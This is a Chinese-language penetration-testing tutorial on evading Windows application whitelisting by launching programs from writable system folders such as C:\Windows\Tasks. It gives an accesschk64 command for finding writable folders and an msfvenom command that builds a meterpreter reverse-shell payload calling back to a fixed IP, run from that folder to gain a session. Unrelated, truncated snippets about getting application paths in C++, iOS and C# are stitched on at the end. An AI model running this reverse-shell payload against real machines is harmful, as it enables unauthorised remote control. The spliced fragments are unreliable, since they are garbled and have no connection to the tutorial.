當您是滲透測試團隊的一員時,發現漏洞非常重要。由於此類漏洞是黑客入侵的根源,因此攻擊者會積極尋找它們。因此,為了修補此類漏洞,您必須知道如何以及在何處找到它們。此類漏洞之一就是windows中的弱資料夾。
現在,如果您嘗試執行任何給定的.exe檔案,它將不會執行。在這裡,我嘗試執行putty.exe檔案,但是如您在下圖中所看到的,它沒有執行。
此策略的漏洞在於,儘管有這樣的安全策略,但仍然只有很少的資料夾具有寫和讀許可權,並且此類檔案將從這些資料夾中執行。如果我在c驅動器》 windows>任務資料夾中執行相同的exe,即putty.exe,則它將如下圖所示執行。
要檢查哪些資料夾具有讀寫許可權,可以使用以下命令:
accesschk64.exe "users" c:/windows -w
使用此命令,您可以在下圖中看到,除了臨時資料夾,任務資料夾和跟蹤資料夾之外,其他所有訪問都被拒絕。
現在讓我們嘗試使用msfvenom通過以下命令針對目標pc建立的惡意軟體:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe
當您在受害者的pc中執行上述惡意軟體時,由於適用的安全策略,該惡意軟體將無法執行。
但是,如果使用漏洞,則可以從task資料夾執行檔案,如下圖所示:
然後,您將根據需要進行會話。
因此,在提供安全性或攻擊時,您必須了解目標計算機的所有知識,以便您可以針對它們使用它們的安全性,或者通過修補此類漏洞來提供更好的安全性。
獲取應用程式的路徑
include stdafx.h include include pragma comment lib,shlwapi.lib using namespace std return pstrpath int tmain int argc,tchar argv 需要注意的是,如果沒有 pragma c...
iOS 獲取應用程式本地路徑
xcode 會為每乙個應用程式生成乙個私有目錄,並隨機生成乙個數字和字母串作為目錄名,在每一次應用程式啟動時,這個字母數字串都是不同於上一次。所以通常使用 documents 目錄進行資料持久化的儲存,獲取示例 如下 nsarray paths nssearchpathfordirectoriesi...
c 獲取當前應用程式所在路徑
二 操作環境變數 利用system.environment.getenvironmentvariable 方法可以很方便地取得系統環境變數,如 system.environment.getenvironmentvariable windir 就可以取得windows系統目錄的路徑。以下是一些常用的環...